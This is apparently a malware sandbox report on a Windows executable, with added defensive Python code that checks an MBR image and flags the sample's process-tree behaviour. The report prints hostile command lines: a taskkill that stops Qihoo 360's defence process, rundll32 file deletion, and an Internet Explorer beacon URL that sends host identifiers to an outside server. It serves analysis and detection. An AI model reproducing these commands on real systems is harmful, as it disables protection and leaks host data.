Analysis
max time kernel: 175s
max time network: 196s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-11-2022 14:59
Static task: static1
Behavioral task: behavioral1
  Sample: 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  Resource: win10v2004-20221111-en
General
Target: 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
Size: 66KB
MD5: 6a8a87bdde4c990495445537002b875d
SHA1: f042ff475685cfb50660876ecabe777638985758
SHA256: 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c
SHA512: 4f786f1e224ad52b82c54117da36927726e863a5850364f34b2dce65540140a38eb0e182119c3d021de089da33321177f9f7ad72a7e988ae43d855ff00840410
SSDEEP: 1536:A0AQ7vNqh8Ks9dFcQanJI3s0t2Jk6HuJAJr0eoKM:4Aqh8KWdVI2eu6O7T
Malware Config
Signatures
-
Executes dropped EXE  1 IoCs
Processes:
  PID 1120  hrdsoft.exe
-
Writes to the Master Boot Record (MBR)  1 TTPs  1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system. The IoC recorded here is a handle to the raw disk opened with write access; the report does not show the bytes written, so an actual MBR change should be confirmed by comparing sector 0 of the disk with a known-good image.
Processes:
  description                   ioc                  process
  File opened for modification  \??\PhysicalDrive0   4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe (PID 228)
-
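The sandbox only records the write-access handle to \??\PhysicalDrive0 above. The following is an added example for this report, not part of the sandbox output or of the sample: it takes a raw 512-byte sector-0 image (dumped from the affected disk) and a baseline image, validates the 0x55AA boot signature, and compares the 446-byte boot code separately from the partition table, since the table legitimately differs between machines while the boot code should not. Both sectors used below are constructed test data; the `read_sector0` helper shows how the live sector would be acquired on Windows with administrator rights.

```python
"""Offline check of a raw sector-0 image against a known-good MBR (added example)."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOTCODE_LEN = 446      # bytes 0..445 hold the boot code
PART_TABLE_OFF = 446    # four 16-byte partition entries follow
BOOT_SIG_OFF = 510      # 0x55 0xAA closes a valid MBR
PART_FMT = "<B3xB3xII"  # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte sector 0 into boot-code hash, partition entries and signature flag."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    partitions = []
    for i in range(4):
        status, ptype, lba_start, count = struct.unpack_from(PART_FMT, sector, PART_TABLE_OFF + 16 * i)
        if ptype:  # type 0x00 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {
        "bootcode_sha256": hashlib.sha256(sector[:BOOTCODE_LEN]).hexdigest(),
        "partitions": partitions,
        "signature_ok": sector[BOOT_SIG_OFF:BOOT_SIG_OFF + 2] == b"\x55\xaa",
    }


def diff_against_baseline(sector: bytes, baseline: bytes) -> list:
    """Return findings as strings; an empty list means sector 0 matches the baseline."""
    cur, base = parse_mbr(sector), parse_mbr(baseline)
    findings = []
    if not cur["signature_ok"]:
        findings.append("boot signature 0x55AA missing: sector is not a valid MBR")
    if cur["bootcode_sha256"] != base["bootcode_sha256"]:
        first = next(i for i in range(BOOTCODE_LEN) if sector[i] != baseline[i])
        findings.append(f"boot code modified, first difference at offset {first:#x}")
    if cur["partitions"] != base["partitions"]:
        findings.append("partition table differs from baseline")
    return findings


def read_sector0(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Acquire the live sector 0 on Windows (needs administrator rights); not used by the tests."""
    with open(device, "rb") as f:
        return f.read(SECTOR_SIZE)


def build_sector(bootcode: bytes, partitions: list) -> bytes:
    """Assemble a synthetic sector 0 from boot code and (bootable, type, lba, count) tuples."""
    sec = bytearray(SECTOR_SIZE)
    sec[:len(bootcode)] = bootcode
    for i, (bootable, ptype, lba, count) in enumerate(partitions):
        struct.pack_into(PART_FMT, sec, PART_TABLE_OFF + 16 * i, 0x80 if bootable else 0, ptype, lba, count)
    sec[BOOT_SIG_OFF:] = b"\x55\xaa"
    return bytes(sec)


# Constructed baseline: a short real-mode stub padded with NOPs and one bootable NTFS partition.
BASELINE = build_sector(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * (BOOTCODE_LEN - 7),
                        [(True, 0x07, 2048, 0x1FFFF800)])
# Constructed tampered image: first 64 bytes of boot code replaced, partition table left intact,
# which is how a bootkit keeps the machine booting while taking control before the OS loads.
INFECTED = build_sector(b"\xeb\xfe" + b"\x41" * 62 + BASELINE[64:BOOTCODE_LEN],
                        [(True, 0x07, 2048, 0x1FFFF800)])

if __name__ == "__main__":
    for name, img in (("baseline", BASELINE), ("infected", INFECTED)):
        print(name, diff_against_baseline(img, BASELINE) or ["matches baseline"])
```

Comparing the boot code hash rather than the whole sector avoids false positives from the disk signature and partition entries, which differ per machine; the offset of the first differing byte tells you where to start disassembling the injected code.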
Drops file in System32 directory  11 IoCs
Processes:
  description                   ioc                                process
  File opened for modification  C:\Windows\SysWOW64\hrdsoft.exe    hrdsoft.exe
  File opened for modification  C:\Windows\SysWOW64\4.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\6.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\7.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\ba1023.ico     4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\9.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\10.ico         4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\2.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\3.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\5.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  File opened for modification  C:\Windows\SysWOW64\8.ico          4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
-
Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature reads "likely ransomware behaviour"; in this run the only raw-disk access recorded is the \??\PhysicalDrive0 open above, and no file-encryption IoCs are listed.
-
Kills process with taskkill  1 IoCs
Processes:
  PID 896  taskkill.exe  (command line, from the process tree: taskkill /f /im ZhuDongFangyu.exe; ZhuDongFangyu.exe is the active-defence component of Qihoo 360 security software, so this is an attempt to disable endpoint protection)
-
Modifies Internet Explorer settings  1 IoCs
Processes:
  description  ioc                                                                                                          process
  Key created  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main   iexplore.exe
-
Suspicious behavior: EnumeratesProcesses  2 IoCs
Processes:
  PID 228  4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe  (2 events)
-
Suspicious use of AdjustPrivilegeToken  5 IoCs
Processes:
  description                pid   process
  Token: SeDebugPrivilege    896   taskkill.exe
  Token: SeRestorePrivilege  1120  hrdsoft.exe
  Token: SeBackupPrivilege   1120  hrdsoft.exe
  Token: SeRestorePrivilege  1120  hrdsoft.exe
  Token: SeBackupPrivilege   1120  hrdsoft.exe
-
Suspicious use of SetWindowsHookEx  2 IoCs
Processes:
  PID 228   4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  PID 1120  hrdsoft.exe
-
Suspicious use of WriteProcessMemory  20 IoCs
Processes:
  source PID  source process                                                            target PID  target process  events
  228         4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe     4280        iexplore.exe    2
  228         4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe     1120        hrdsoft.exe     3
  1120        hrdsoft.exe                                                               896         taskkill.exe    3
  1120        hrdsoft.exe                                                               3384        rundll32.exe    3
  1120        hrdsoft.exe                                                               452         rundll32.exe    3
  1120        hrdsoft.exe                                                               4472        rundll32.exe    3
  1120        hrdsoft.exe                                                               4120        rundll32.exe    3
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe"
  - Writes to the Master Boot Record (MBR)
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Program Files\Internet Explorer\iexplore.exe
    command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5913.net/a/get.asp?mac=FAE5CAF40400&makedate=QM00013&comput=Home&ver=81&userid=0001
    - Modifies Internet Explorer settings
  [depth 2] C:\Windows\SysWOW64\hrdsoft.exe
    command line: C:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe===
    (the command line names System32 but the file lives in SysWOW64: the sample is 32-bit, so WoW64 file-system redirection sends its System32 writes to SysWOW64)
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im ZhuDongFangyu.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\rundll32.exe
      command line: rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\google chrome.lnk
    [depth 3] C:\Windows\SysWOW64\rundll32.exe
      command line: rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\microsoft edge.lnk
    [depth 3] C:\Windows\SysWOW64\rundll32.exe
      command line: rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
    [depth 3] C:\Windows\SysWOW64\rundll32.exe
      command line: rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
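The process tree above contains four patterns worth turning into detection logic: rundll32 calling advpack.dll,DelNodeRunDLL32 to delete files without cmd.exe, a forced taskkill of a security product, a binary in SysWOW64 launched by a parent running from a user Temp directory, and Internet Explorer started by a non-browser parent with a URL whose query string carries host identifiers (mac, comput, userid, ver, makedate). The following is an added example, not part of the sandbox report: it runs those four rules over process-creation records in a simplified Sysmon Event ID 1 shape (pid, image, cmdline, parent). The records are constructed from the tree above; the sandbox does not pair the four rundll32 PIDs with specific shortcuts, so that pairing follows the order of the WriteProcessMemory list and is an assumption.

```python
"""Rule checks for the parent/child and command-line patterns in the process tree (added example)."""
import ntpath
import re
from urllib.parse import parse_qs, urlparse

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe"
HRDSOFT = r"C:\Windows\SysWOW64\hrdsoft.exe"
QL = r"c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch"

# Only the product observed in this run is listed; extend with the agents deployed in your estate.
PROTECTED_IMAGES = {"zhudongfangyu.exe"}  # Qihoo 360 active-defence process
BROWSER_PARENTS = {"explorer.exe", "iexplore.exe", "msedge.exe", "chrome.exe"}
HOST_ID_PARAMS = {"mac", "comput", "userid", "ver", "makedate"}
SYSTEM_UTILS = {"rundll32.exe", "taskkill.exe", "cmd.exe", "conhost.exe"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_event(ev: dict) -> list:
    """Return (rule, detail) tuples for one process-creation record."""
    image, cmd, parent = _base(ev["image"]), ev["cmdline"], _base(ev["parent"])
    hits = []

    # rundll32 advpack.dll,DelNodeRunDLL32 <path>: a LOLBin deleting files
    # (here the Quick Launch .lnk shortcuts) with no cmd.exe or del on the command line.
    if image == "rundll32.exe" and re.search(r"advpack\.dll\s*,\s*DelNodeRunDLL32", cmd, re.I):
        target = re.split(r"DelNodeRunDLL32", cmd, maxsplit=1, flags=re.I)[1].strip()
        hits.append(("lolbin_file_delete", target))

    # taskkill /f /im <security agent>: tampering with endpoint protection.
    if image == "taskkill.exe" and re.search(r"/f\b", cmd, re.I):
        m = re.search(r"/im\s+(\S+)", cmd, re.I)
        if m and m.group(1).lower() in PROTECTED_IMAGES:
            hits.append(("kill_security_product", m.group(1)))

    # A binary in System32/SysWOW64 started by a parent running from a user Temp
    # directory: the dropped copy (hrdsoft.exe) executing from the system directory.
    if (re.search(r"\\(system32|syswow64)\\", ev["image"], re.I)
            and re.search(r"\\appdata\\local\\temp\\", ev["parent"], re.I)
            and image not in SYSTEM_UTILS):
        hits.append(("dropped_exe_in_system_dir", ev["image"]))

    # iexplore.exe spawned by something other than the shell or a browser, with a URL
    # whose query string carries host identifiers: the browser used as a check-in beacon.
    if image == "iexplore.exe" and parent not in BROWSER_PARENTS:
        for tok in cmd.split():
            if tok.lower().startswith(("http://", "https://")):
                url = urlparse(tok)
                leaked = sorted(set(parse_qs(url.query)) & HOST_ID_PARAMS)
                if leaked:
                    hits.append(("browser_beacon", f"{url.netloc} leaks {','.join(leaked)}"))
    return hits


def scan(events: list) -> list:
    """Run every rule over every record; returns (pid, rule, detail) tuples."""
    return [(ev["pid"], rule, detail) for ev in events for rule, detail in check_event(ev)]


# Constructed from the process tree above (PID 228, the sample itself, appears only as a parent).
EVENTS = [
    {"pid": 4280, "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" '
                "http://www.5913.net/a/get.asp?mac=FAE5CAF40400&makedate=QM00013&comput=Home&ver=81&userid=0001"},
    {"pid": 1120, "image": HRDSOFT, "parent": SAMPLE,
     "cmdline": r"C:\Windows\system32\hrdsoft.exe " + SAMPLE + "==="},
    {"pid": 896, "image": r"C:\Windows\SysWOW64\taskkill.exe", "parent": HRDSOFT,
     "cmdline": "taskkill /f /im ZhuDongFangyu.exe"},
] + [
    {"pid": pid, "image": r"C:\Windows\SysWOW64\rundll32.exe", "parent": HRDSOFT,
     "cmdline": rf"rundll32.exe advpack.dll,DelNodeRunDLL32 {QL}\{lnk}"}
    # PID-to-shortcut pairing assumed from the order of the WriteProcessMemory list.
    for pid, lnk in ((3384, "google chrome.lnk"), (452, "microsoft edge.lnk"),
                     (4472, "shows desktop.lnk"), (4120, "window switcher.lnk"))
]

if __name__ == "__main__":
    for pid, rule, detail in scan(EVENTS):
        print(f"PID {pid:>5}  {rule:<26} {detail}")
```

The parent-image check in the beacon rule is what keeps a user-launched browser quiet: the same URL opened from explorer.exe does not fire. In a SIEM the same four conditions map directly onto Sysmon Event ID 1 fields (Image, CommandLine, ParentImage).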
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Windows\SysWOW64\hrdsoft.exe
Filesize: 21KB
MD5: f43c6092eba273dae6b1adea10a8b6e1
SHA1: e4cbdfa66d74d0a10793df4c45c50c98da702081
SHA256: c50741ad9ef538177d76e7790aa2502870b51223324db72f183f73f414e349eb
SHA512: 1cf83eb17597d26ca003cc63e97e96e703dcd39be5954a5dc256d4c6601e71b7a13fa756277015b3e325c3d4f14df6667f9310c7fb4bfa759eae71d684ce3f45
-
memory/228-132-0x0000000000400000-0x0000000000423000-memory.dmp   140KB
memory/228-141-0x0000000000400000-0x0000000000423000-memory.dmp   140KB
memory/452-144-0x0000000000000000-mapping.dmp
memory/896-142-0x0000000000000000-mapping.dmp
memory/1120-135-0x0000000000000000-mapping.dmp
memory/1120-140-0x0000000000400000-0x0000000000414000-memory.dmp  80KB
memory/1120-147-0x0000000000400000-0x0000000000414000-memory.dmp  80KB
memory/3384-143-0x0000000000000000-mapping.dmp
memory/4120-146-0x0000000000000000-mapping.dmp
memory/4472-145-0x0000000000000000-mapping.dmp